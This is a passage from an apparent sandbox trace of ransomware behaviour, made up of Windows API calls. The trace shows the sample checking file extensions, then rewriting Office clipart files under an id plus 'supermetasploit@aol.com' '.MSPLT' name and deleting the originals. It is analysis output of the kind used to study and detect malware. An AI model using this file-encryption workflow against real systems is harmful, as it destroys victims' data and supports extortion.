Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.774] lstrlenW (lpString=".zip") returned 4 [0310.774] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.774] lstrlenW (lpString=".rar") returned 4 [0310.774] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.774] lstrlenW (lpString=".bz2") returned 4 [0310.774] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString=".7z") returned 3 [0310.775] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.775] lstrlenW (lpString=".dbf") returned 4 [0310.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.775] lstrlenW (lpString=".1cd") returned 4 [0310.775] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.775] lstrlenW (lpString=".jpg") returned 4 [0310.775] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.775] lstrlenW (lpString=".doc") returned 4 [0310.775] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString=".docx") returned 5 [0310.775] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.775] lstrlenW (lpString=".pdf") returned 4 [0310.775] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.775] lstrlenW (lpString=".xls") returned 4 [0310.775] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.775] lstrlenW (lpString=".xlsx") returned 5 [0310.775] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.775] lstrlenW (lpString=".ppt") returned 4 [0310.775] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.776] lstrlenW (lpString=".zip") returned 4 [0310.776] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.776] lstrlenW (lpString=".rar") returned 4 [0310.776] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.776] lstrlenW (lpString=".bz2") returned 4 [0310.776] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.776] lstrlenW (lpString=".7z") returned 3 [0310.776] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.776] lstrlenW (lpString=".dbf") returned 4 [0310.776] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.776] lstrlenW (lpString=".1cd") returned 4 [0310.776] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.776] lstrlenW (lpString=".jpg") returned 4 [0310.776] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.776] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.776] lstrlenW (lpString="BS00174_.WMF") returned 12 [0310.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0310.777] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=8366) returned 1 [0310.777] CloseHandle (hObject=0x3e4) returned 1 [0310.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf")) returned 0x220 [0310.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0310.778] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.778] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0310.779] GetLastError () returned 0x0 [0310.779] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x20ae, lpOverlapped=0x0) returned 1 [0311.850] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x20b0, lpOverlapped=0x0) returned 1 [0311.852] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0311.852] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0311.852] SetEndOfFile (hFile=0x530) returned 1 [0311.852] CloseHandle (hObject=0x530) returned 1 [0311.870] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0311.871] SetEndOfFile (hFile=0x3e4) returned 1 [0312.091] CloseHandle (hObject=0x3e4) returned 1 [0312.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.095] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0312.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.096] lstrlenW (lpString=".doc") returned 4 [0312.096] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.096] lstrlenW (lpString=".docx") returned 5 [0312.096] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.096] lstrlenW (lpString=".pdf") returned 4 [0312.097] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.097] lstrlenW (lpString=".xls") returned 4 [0312.097] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.097] lstrlenW (lpString=".xlsx") returned 5 [0312.097] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.097] lstrlenW (lpString=".ppt") returned 4 [0312.097] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.097] lstrlenW (lpString=".zip") returned 4 [0312.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.097] lstrlenW (lpString=".rar") returned 4 [0312.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.097] lstrlenW (lpString=".bz2") returned 4 [0312.097] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.097] lstrlenW (lpString=".7z") returned 3 [0312.097] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.098] lstrlenW (lpString=".dbf") returned 4 [0312.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.098] lstrlenW (lpString=".1cd") returned 4 [0312.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.098] lstrlenW (lpString=".jpg") returned 4 [0312.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.098] lstrlenW (lpString=".doc") returned 4 [0312.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.098] lstrlenW (lpString=".docx") returned 5 [0312.098] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.098] lstrlenW (lpString=".pdf") returned 4 [0312.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.098] lstrlenW (lpString=".xls") returned 4 [0312.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.098] lstrlenW (lpString=".xlsx") returned 5 [0312.098] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.098] lstrlenW (lpString=".ppt") returned 4 [0312.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.099] lstrlenW (lpString=".zip") returned 4 [0312.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.099] lstrlenW (lpString=".rar") returned 4 [0312.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.099] lstrlenW (lpString=".bz2") returned 4 [0312.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.099] lstrlenW (lpString=".7z") returned 3 [0312.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.099] lstrlenW (lpString=".dbf") returned 4 [0312.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.099] lstrlenW (lpString=".1cd") returned 4 [0312.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0312.100] lstrlenW (lpString=".jpg") returned 4 [0312.100] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.100] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.101] lstrlenW (lpString="BS00200_.WMF") returned 12 [0312.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.107] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3104) returned 1 [0312.108] CloseHandle (hObject=0x3e4) returned 1 [0312.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf")) returned 0x220 [0312.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.109] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.109] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0312.110] GetLastError () returned 0x0 [0312.110] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xc20, lpOverlapped=0x0) returned 1 [0312.134] WriteFile (in: hFile=0x488, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xc30, lpOverlapped=0x0) returned 1 [0312.135] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0312.135] WriteFile (in: hFile=0x488, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0312.135] SetEndOfFile (hFile=0x488) returned 1 [0312.136] CloseHandle (hObject=0x488) returned 1 [0312.139] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.139] SetEndOfFile (hFile=0x3e4) returned 1 [0312.143] CloseHandle (hObject=0x3e4) returned 1 [0312.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0312.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.145] lstrlenW (lpString=".doc") returned 4 [0312.146] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString=".docx") returned 5 [0312.146] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.146] lstrlenW (lpString=".pdf") returned 4 [0312.146] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString=".xls") returned 4 [0312.146] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.146] lstrlenW (lpString=".xlsx") returned 5 [0312.146] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.146] lstrlenW (lpString=".ppt") returned 4 [0312.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.146] lstrlenW (lpString=".zip") returned 4 [0312.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.146] lstrlenW (lpString=".rar") returned 4 [0312.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString=".bz2") returned 4 [0312.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString=".7z") returned 3 [0312.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.146] lstrlenW (lpString=".dbf") returned 4 [0312.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.146] lstrlenW (lpString=".1cd") returned 4 [0312.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.146] lstrlenW (lpString=".jpg") returned 4 [0312.147] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.147] lstrlenW (lpString=".doc") returned 4 [0312.147] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString=".docx") returned 5 [0312.147] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.147] lstrlenW (lpString=".pdf") returned 4 [0312.147] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString=".xls") returned 4 [0312.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.147] lstrlenW (lpString=".xlsx") returned 5 [0312.147] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.147] lstrlenW (lpString=".ppt") returned 4 [0312.147] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.147] lstrlenW (lpString=".zip") returned 4 [0312.147] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.147] lstrlenW (lpString=".rar") returned 4 [0312.147] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString=".bz2") returned 4 [0312.147] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.147] lstrlenW (lpString=".7z") returned 3 [0312.147] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.147] lstrlenW (lpString=".dbf") returned 4 [0312.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.148] lstrlenW (lpString=".1cd") returned 4 [0312.148] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0312.148] lstrlenW (lpString=".jpg") returned 4 [0312.148] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.148] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.148] lstrlenW (lpString="BS00224_.WMF") returned 12 [0312.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.149] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=1588) returned 1 [0312.149] CloseHandle (hObject=0x3e4) returned 1 [0312.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf")) returned 0x220 [0312.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0312.150] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.150] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0312.151] GetLastError () returned 0x0 [0312.151] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x634, lpOverlapped=0x0) returned 1 [0312.398] WriteFile (in: hFile=0x488, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x640, lpOverlapped=0x0) returned 1 [0312.399] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0312.399] WriteFile (in: hFile=0x488, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0312.400] SetEndOfFile (hFile=0x488) returned 1 [0312.400] CloseHandle (hObject=0x488) returned 1 [0312.404] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.404] SetEndOfFile (hFile=0x3e4) returned 1 [0312.518] CloseHandle (hObject=0x3e4) returned 1 [0312.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf")) returned 1 [0312.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.520] lstrlenW (lpString=".doc") returned 4 [0312.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.520] lstrlenW (lpString=".docx") returned 5 [0312.520] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.520] lstrlenW (lpString=".pdf") returned 4 [0312.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.520] lstrlenW (lpString=".xls") returned 4 [0312.520] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.520] lstrlenW (lpString=".xlsx") returned 5 [0312.520] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.520] lstrlenW (lpString=".ppt") returned 4 [0312.520] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0312.520] lstrlenW (lpString=".zip") returned 4 [0312.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.520] lstrlenW (lpString=".rar") returned 4 [0312.520] lstrcmpiW 